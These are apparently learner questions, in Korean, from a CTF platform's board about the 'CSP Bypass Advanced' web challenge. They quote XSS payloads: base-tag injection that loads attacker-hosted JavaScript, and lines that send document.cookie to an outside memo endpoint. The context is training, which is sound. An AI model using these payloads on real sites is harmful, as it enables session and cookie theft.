CSP Bypass Advanced

csp bypass와 advanced의 차이가 궁금합니다 csp bypass에서 사용된 페이로드가 csp bypass advanced 에서 먹히지 않는 이유를 잘 모르겠습니다. return과 render template 의 차이라는 것 까지는 어디선가 들어왔는데, 자세한 내용과 원리를 알고 싶습니다.

강의에 나온대로 base-uri방식으로 진행하려 하는데 잘 안되네요..개인 서버에 static/js 경로에 jquery.min.js파일을 만들고 base태그를 사용해서 <script src="/vuln?param='<base href='http://IP_addr/'>'"> <base href='http://IP_addr/'> 두 방법으로 시도했는데 잘 안되네요.. 스크립트 파일 안에는 document.location='http://host3.dreamhack.games:port/memo?memo='+document.cookie같이 작성했습니다.. 혹시 이 부분에서 잘못된것이 있을까요 아니면 방향이 틀린걸까요..ㅜ

안녕하세요. location.href 경로 설정에 있어서 도움을 얻고자 질문을 드리게 되었습니다. 저는 우선 github에서 서버를 여는 방식을 선택했습니다. 첫 번째 시도했을 때는 repository를 webtest로 만들고, 그 안에 /static/js/jquery.min.js 경로를 가지는 파일을 만들었고, vuln 페이지에서 param을 <base href="https://이름.github.io/webtest" /> 로 전달하였는데, 실패했습니다. 두 번째 시도했을 때는 repository를 static으로 만들고, 그 안에 /js/jquery.min.js 경로를 가지는 파일을 만들었고, vuln 페이지에서 param을 <base href="https://이름.github.io/" /> 로 전달하였는데,성공했습니다. 웹 브라우저에서 두 경로를 접속하면, location.href = "http://127.0.0.1:8000/memo?memo="+document.cookie; 가 올바르게 나옵니다. base 뒤에 똑같이 /static/js/jquery.min.js이 붙는데, 왜 첫 번째 경우는 안되는 것인지 궁금합니다. 읽어주셔서 감사합니다.

제 깃허브 레포지토리 이용해서 /static/js/bootstrap.min.js 에 다음과 같이 location.href = "http://127.0.0.1:8000/memo?=memo"+document.cookie 삽입했습니다. 개발자 도구에서 해당 스크립트를 받아오는지 까지 확인을 한 결과, source에서 bootstrap.min.js 확인시, 잘 받아옵니다. 한데, 곧이어 127.0.0.1 에서 연결을 거부했다는 오류가 뜨네요 .. 이유가 뭘까요?

/vuln 페이지에선 정상 작동하는 스크립트가 /flag 페이지에선 wrong?? 분출하며 막힙니다.. 개인 PC에 문제파일을 다운로드받아 실행시켜보니 Chrome driver 및 selenium 문제라 해서 해결하고 스크립트 사용해보니 flag.txt를 정상적으로 읽어오는 것 같긴하더라구요.. 제가 놓치고 있는 부분이 무엇인지 감이 안 잡힙니다..

개인 서버를 이용하여 풀어야 한다는 건 알았는데... 혹시 개인 서버를 갖고 있는 것이 당연한 건가요 ㅜㅜㅜ 문제 하나 풀려고 도메인부터 웹 호스팅 서비스를 구입하기에는 조금 부담스러운 처지인데, 다른 분들은 이런 부분을 어떻게 해결했는지 여쭙고 싶습니다

해당 문제를 base uri를 이용하는 방식으로 풀었는데, vuln페이지에 있는 nonce 속성은 어떻게 기능하기에 왜 들어간 건가요? 해당 문제에서 nonce가 차지하는 부분은 없다고 봐도 무방한가요?

base-uri를 허용하지 않는다는 CSP 구문이 없으니 base-uri을 이용하여 풀이를 한다는 점을 알게 되었습니다. 그리고 기존에 올라온 질문들을 보니 개인서버도 필요하다고 하니 가상머신 실행 후 아파치 설치하고 /var/www/html 폴더에 /static/js 폴더 생성 후 거기에 쿠키를 빼올 스크립트 파일도 작성하고 base 구문을 /vuln 페이지에 입력했는데 'wrong?'이라고 뜹니다.

vuln 페이지에서 base 태그로 개인 서버의 자바스크립트 실행해서 memo에 빈칸 나오는 것 까지는 확인햇습니다 그런데 flag 페이지에서는 계속 wrong이 뜨네요... 그리고 자바스크립트 파일에 코드를 밑에처럼 넣으면 안되는 이유가 무엇인가요? location.href = "http://host3.dreamhack.games:{port}/memo?memo="+document.cookie

<script src=/vuln?param=<script>alert(1)</script>></script> 대략 이런식으로 vuln 페이지에서 테스트 해보았을때 html 코드를 받아와 작동이 안되는 것같습니다. script 태그의 type 도 혹시나하여 text/html 로 변경해 보았는데 실패했습니다. 문제가 아예 지전이 없네요 힌트등.. 도움을 주시면 감사하겠습니다.